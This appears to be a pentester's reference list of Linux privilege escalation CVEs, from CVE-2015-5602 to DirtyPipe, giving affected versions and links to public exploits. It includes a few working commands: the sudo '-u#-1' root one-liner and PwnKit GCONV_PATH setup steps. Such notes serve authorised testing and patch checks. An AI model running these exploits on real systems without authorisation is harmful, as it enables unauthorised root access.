### CVE-2015-5602 sudoedit

#### Affected versions

![](Pasted%20image%2020220126123259.png)

### CVE-2016-1531

#### Affected versions

```
exim version < 4.84-3 local root exploit
```

poc: [exploits/cve-2016-1531.sh at master · hackerhouse-opensource/exploits · GitHub](https://github.com/hackerhouse-opensource/exploits/blob/master/cve-2016-1531.sh)

### CVE-2017-16995

#### Affected versions

```
Ubuntu kernel 4.14~4.4
```

poc: [exploits/cve-2017-16995.c at master · rlarabee/exploits · GitHub](https://github.com/rlarabee/exploits/blob/master/cve-2017-16995/cve-2017-16995.c)

### CVE-2019-14287 sudo !root

#### check

```
# Look for Runas specs that allow every user except root
grep -E '\(\s*ALL\s*,\s*!root\s*\)' /etc/sudoers
grep -E '\(\s*ALL\s*,\s*!#0\s*\)' /etc/sudoers
```

poc:

```
sudo -u#-1 bash
```

### CVE-2021-4034 polkit privilege escalation

#### Affected versions

```
Versions not affected

CentOS:
CentOS 6: polkit-0.96-11.el6_10.2
CentOS 7: polkit-0.112-26.el7_9.1
CentOS 8.0: polkit-0.115-13.el8_5.1
CentOS 8.2: polkit-0.115-11.el8_2.2
CentOS 8.4: polkit-0.115-11.el8_4.2

Ubuntu:
Ubuntu 14.04 ESM: policykit-1-0.105-4ubuntu3.14.04.6+esm1
Ubuntu 16.04 ESM: policykit-1-0.105-14.1ubuntu0.5+esm1
Ubuntu 18.04 LTS: policykit-1-0.105-20ubuntu0.18.04.6
Ubuntu 20.04 LTS: policykit-1-0.105-26ubuntu1.2
Ubuntu 21.10: policykit-1-0.105-31ubuntu0.1

Debian:
policykit-1 0.105-18+deb9u2
Debian stretch: policykit-1 0.105-18+deb9u2
Debian buster: policykit-1 0.105-25+deb10u1
Debian bullseye: policykit-1 0.105-31+deb11u1
Debian bookworm,bullseye: policykit-1 0.105-31.1
```

#polkit

```
https://github.com/ghostaatrox/pkexec-CVE-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /bin/true GCONV_PATH=./pwnkit.so:.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
```

poc: [GitHub - berdav/CVE-2021-4034: CVE-2021-4034 1day](https://github.com/berdav/CVE-2021-4034)

### CVE-2021-3156 sudo privilege escalation

#### Affected versions

```
sudo version
1.8.2-1.8.31sp12
1.9.0-1.9.5sp1
sudo >=1.9.5sp2
```

poc: [GitHub - worawit/CVE-2021-3156: Sudo Baron Samedit Exploit](https://github.com/worawit/CVE-2021-3156)

### CVE-2021-3493

#### Affected versions

```
Ubuntu 20.10
Ubuntu 20.04 LTS
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS
Ubuntu 14.04 ESM
```

poc: [GitHub - briskets/CVE-2021-3493: Ubuntu OverlayFS Local Privesc](https://github.com/briskets/CVE-2021-3493.git)

### CVE-2021-33909

#### Affected versions

```
Ubuntu 20.04, Ubuntu 20.10, Ubuntu 21.04, Debian 11 and Fedora 34 Workstation
```

poc: [GitHub - Liang2580/CVE-2021-33909: Sequoia exploit (7/20/21)](https://github.com/Liang2580/CVE-2021-33909)

### CVE-2022-0847 DirtyPipe

#### Affected versions

```
Linux Kernel 5.8 < 5.16.11
```

poc: [Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe) - Linux local Exploit](https://www.exploit-db.com/exploits/50808)

[https://haxx.in/files/dirtypipez.c](https://haxx.in/files/dirtypipez.c)